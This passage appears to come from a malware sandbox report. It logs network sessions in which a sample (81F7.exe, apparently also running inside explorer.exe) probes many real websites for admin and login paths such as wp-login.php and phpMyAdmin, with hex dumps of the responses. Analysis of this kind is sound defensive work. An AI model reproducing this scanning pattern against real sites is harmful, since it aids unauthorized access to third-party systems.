67 74 68 2d 6d 65 Data Ascii: 0n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};/* ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-admin/js/password-strength-me
2024-02-20 23:26:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.6	49754	13.248.243.5	443	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	212	OUT	GET /admin.php HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:16 GMT Connection: close
2024-02-20 23:26:16 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
217	192.168.2.6	50056	13.248.169.48	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	169	OUT	GET /admin HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aR0VkpBmn9lirUvL+TDyovTf7gd+tZNIkF2SAtDxnjbZFdpyS2QEqWcwMMZlCbqYaJHV7/Ws8FmQN0vwkLTbkw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:16 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.6	49751	208.109.43.169	443	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	172	OUT	GET /pma/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:17 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.6	49939	162.0.235.125	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:17 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:17 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.6	50243	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	165	OUT	GET /admin HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_MMuqzHc8qmHLkjV8zbSav3pnYYW9skP3AmKsqAMiOuMJv/qc9POigVrSJ5jXax7y8O5yhHQHZ4bExYruoV5Jnw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:17 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.6	49783	13.232.255.130	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:17 UTC	6192	IN	Data Raw: 31 38 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1823<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.6	50233	217.26.61.200	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Set-Cookie: PHPSESSID=p6q633npd2lnvk4v8rbvdilhhdqasur3; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:18 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:18 UTC	464	IN	Data Raw: 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 Data Ascii: lock-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8
2024-02-20 23:26:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:18 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f Data Ascii: 2000ng-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-blo
2024-02-20 23:26:18 UTC	6	IN	Data Raw: 61 79 2d 62 6f 72 Data Ascii: ay-bor
2024-02-20 23:26:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:18 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 Data Ascii: 2000der-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important
2024-02-20 23:26:18 UTC	6	IN	Data Raw: 61 6c 2d 63 6f 6c Data Ascii: al-col
2024-02-20 23:26:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:18 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 Data Ascii: 2000or-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.6	50468	75.2.70.75	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	216	OUT	GET /wp-admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.eyegage.com/wp-login.php
2024-02-20 23:26:17 UTC	180	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/wp-admin
2024-02-20 23:26:17 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.6	50383	85.13.138.112	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	164	OUT	GET /pma/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:17 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.6	50325	15.161.71.77	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	183	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	443	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpMyAdmin Content-Length: 249 Connection: close Content-Type: text/html; charset=iso-8859-1
